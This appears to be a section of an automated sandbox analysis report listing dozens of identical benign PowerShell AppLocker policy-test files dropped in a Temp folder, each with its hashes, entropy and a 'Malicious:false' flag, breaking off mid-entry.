                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2or1cl2y.lb1.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2vewpp0d.fk5.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_31yw5j2n.dso.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3pkfipke.jpz.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_40gqgpjm.pa4.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4fyeuznz.jza.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_55i4zqcw.g1q.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_55mrege4.ghn.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5dnjqpd4.ehz.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aekhbmoo.otm.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_akrvyaxg.zh1.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ascf3ryy.qmu.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b3tyrygz.xji.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b5og52rx.yda.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bamumtca.1lb.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_btchjxxi.yv0.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_byunmgcu.wal.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c2vnljga.ydt.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c455msun.20l.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c4lbow0n.img.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ccq2qjuy.eah.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dktjbud2.5ao.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_edslxxiq.0x4.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f2yocdkz.mkr.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fi1ximv5.4gw.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fsrlg5tl.eat.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g5ae0if4.hg3.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gdl10gi3.ni2.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hadwem2v.0rt.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hqcvbabf.zul.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
